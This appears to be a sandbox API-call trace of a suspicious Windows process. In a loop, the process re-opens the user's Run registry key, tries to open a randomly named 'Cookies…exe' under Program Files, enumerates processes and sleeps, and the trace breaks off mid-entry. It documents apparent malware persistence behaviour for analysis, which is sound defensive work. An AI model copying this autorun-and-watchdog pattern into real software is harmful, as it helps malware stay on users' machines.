(Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.985] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.986] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.986] NtClose (Handle=0x338) returned 0x0 [0299.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.986] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.986] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0299.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.986] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.986] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0299.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.106] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.109] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.109] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.109] NtClose (Handle=0x338) returned 0x0 [0300.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.110] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.110] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0300.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.110] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.110] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0300.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.225] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.227] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.228] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.228] NtClose (Handle=0x338) returned 0x0 [0300.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.228] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.228] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0300.229] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.229] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.229] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0300.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.339] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.340] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.342] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.342] NtClose (Handle=0x338) returned 0x0 [0300.342] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.342] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.342] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0300.342] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.342] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.342] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0300.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.462] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.464] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.465] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.465] NtClose (Handle=0x338) returned 0x0 [0300.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.465] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.465] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0300.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.466] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.466] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0300.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.617] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.618] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.620] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.620] NtClose (Handle=0x338) returned 0x0 [0300.620] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.620] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.621] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0300.621] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.621] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.621] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0300.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.737] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.738] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.739] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.739] NtClose (Handle=0x338) returned 0x0 [0300.739] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.739] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.740] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0300.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.740] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files 